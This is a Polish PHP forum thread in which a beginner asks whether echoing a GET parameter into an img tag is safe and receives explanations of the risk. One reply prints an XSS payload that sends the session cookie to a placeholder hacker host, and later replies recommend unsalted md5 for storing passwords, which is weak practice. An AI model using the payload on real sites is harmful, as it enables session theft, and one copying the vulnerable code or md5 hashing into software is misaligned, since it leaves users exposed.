Bezpieczeństwo.., Kod bezpieczny? Opcje

[lol666]

Pytam się na wszelki wypadek.

[PHP] pobierz, plaintext 
<?php
  echo '<img src="' . $_GET['adres'] . '">';
?>
[PHP] pobierz, plaintext 

Są jakieś inne metody umieszczania grafik w php?
Z góry dzięki.

[nazihipi]

nie jest bezpieczny

Temat: Bezpieczenstwo skryptow php

[My4tic]

No jak bedziesz to robił tak jak napisałes to na pewno nie bedzie to bezpieczne. Filtruj dane pobierane od usera takimi funkcjami jak http://pl2.php.net/manual/pl/function.strip-tags.php" title="Zobacz w manualu php" target="_manual. Poza tym możesz wprowadzić limit długości, sprawdzac rozszerzenie... możliwości jest sporo.

[lol666]

Mam jeszcze pare pytań:

1. o co chodzi z tym /etc/passwd

2. Apropo mojego kodu nie rozumiem jak ktoś miałby zagrozić mojemy skryptowi lub serwerowi (sry jestem zielony w php). Podajcie może jakiś przykład.

Dzięki za wszelkie porady Pozdro z nad morza

Maks

Ten post edytował lol666 23.08.2006, 23:11:50

[nasty]

o co chodzi z tym /etc/passwd

chodzi o to ze to bylo nie bezpiczny plik, i sporo wlamow bylo robionych po odczytaniu hasla z niego (brute-force) ale to jakies 10 lat temu

[nazihipi]

2. Apropo mojego kodu nie rozumiem jak ktoś miałby zagrozić mojemy skryptowi (sry jestem zielony w php). Podajcie może jakiś przykład.

[HTML] pobierz, plaintext 
http://www.twojastrona.pl/index.php?adres=dupa_admina.jpg
[HTML] pobierz, plaintext 

[PHP] pobierz, plaintext 
<?php
  echo '<img src="' . $_GET['adres'] . '">';
?>
[PHP] pobierz, plaintext 

output:

[HTML] pobierz, plaintext 
<img src='dupa_admina.jpg'>
[HTML] pobierz, plaintext 

a co najgorsze można próbować ataków, polegających na wrzucaniu fragmentów kodu php, które namieszają

pozytaj w manualu

[Cysiaczek]

/etc/passwd to plik zawierający hasła (zwykle kodowane) użytkowników serwera (w domyślnej konfiguracji). Podstawy Linuxa

Ktoś może Ci po prostu wpisać w url ścieżkę do tego pliku i ewentualnie coś jeszcze przydkiego porobić.

Pozdrawiam.

[dr_bonzo]

2. Apropo mojego kodu nie rozumiem jak ktoś miałby zagrozić mojemy skryptowi (sry jestem zielony w php). Podajcie może jakiś przykład.

[PHP] pobierz, plaintext 
<?php
  echo '<img src="' . $_GET['adres'] . '">';
?>
[PHP] pobierz, plaintext 

index.php?adres="><script>document.location='http://www.strona-hackera.com/cgi-bin/cookie.cgi? '%20+document.cookie</script>

cos w tym stylu -- czyli haker (cracker -- no niewazne) pobierze wartosc naszego ciacha sesyjnego, co moze mu pozwolic zalogowac sie na nasze konto bez znajomosci hasla.

Przyklad stad: http://www.cgisecurity.com/articles/xss-faq.shtml


index.php?adres="http://server.hackera.com/cookie_harvester.php?

[lol666]

JEZU :exclamation: SAMOZAGŁADA!

Dobra kontynuuje pytania:

Wiem że algorytm z dziedziny kryptografii... (http://pl.wikipedia.org/wiki/MD5), ale jakie jest jego praktyczne zastosowanie w php?

[kszychu]

/etc/passwd to plik zawierający hasła (zwykle kodowane) użytkowników serwera (w domyślnej konfiguracji). Podstawy Linuxa

Głupoty pleciesz. /etc/passwd nie zawiera żadnych haseł, ale i tak nie wskazane jest, by ktoś obcy poznał jego zawartość.

@lol666: praktyczne zastosowanie md5 w php (wszędzie indziej z resztą też) to przede wszystkim kodowanie haseł, sumy kontolne plików i pewnie inne jeszcze. Ja używam głównie do tego.

[Ja_Szczur]

np. przechowywanie haseł w bazie

przy rejestracji:

[PHP] pobierz, plaintext 
<?php
zapisz_usera( $_POST['nick'] , md5( $_POST['pass'] ) , $_POST['email'] );
?>
[PHP] pobierz, plaintext 

przy logowaniu:

[PHP] pobierz, plaintext 
<?php
if( md5( $_POST['pass'] ) == $haslo_z_bazy_shashowane_md5 )
   // zalogowany
else
   // złe hasło!
?>
[PHP] pobierz, plaintext 

takie hasło ma zawsze 32 znaki
no i jest mała szansa na powtórzenie takiego hash'a